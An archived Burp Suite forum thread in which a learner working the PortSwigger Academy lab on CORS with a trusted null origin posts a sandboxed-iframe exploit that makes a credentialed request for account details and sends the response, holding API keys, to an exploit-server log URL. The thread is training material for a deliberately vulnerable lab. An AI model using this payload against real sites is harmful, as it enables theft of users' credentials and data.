Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

CORS vulnerability with trusted null origin

Philip | Last updated: Nov 14, 2021 03:12PM UTC

Hi - trying to complete the CORS vulnerability with trusted null origin lab. I have put in the following script to the exploit server using appropriate urls. <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script> var req = new XMLHttpRequest (); req.onload = reqListener; req.open('get','https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/my-account/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='https://exploit-ac8d1f471f15ee85c0070e2e01c5003c.web-security-academy.net/exploit/log?key='+encodeURIComponent(this.responseText); }; </script>"></iframe> I deliver exploit but when I check the logs I only get API keys for wiener and not for administrator, so the API key does not work when I decode and enter it. I have also tried to do the lab with a modified user url omitting "my-account" part of the url path (https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/accountDetails) but still can't get the admin API. Any suggestsions? Thanks

Philip | Last updated: Nov 14, 2021 03:23PM UTC

Update: managed to get it to work with https://acdd1f431f9dee5ac0c80ef5001300f2.web-security-academy.net/accountDetails but when I view exploit I get the iframe with "Resource not found - Academy Exploit Server". Not sure if that should be what we see when viewing exploit. But this is what allowed me to get the admin API from the access log.

Ben, PortSwigger Agent | Last updated: Nov 16, 2021 10:42AM UTC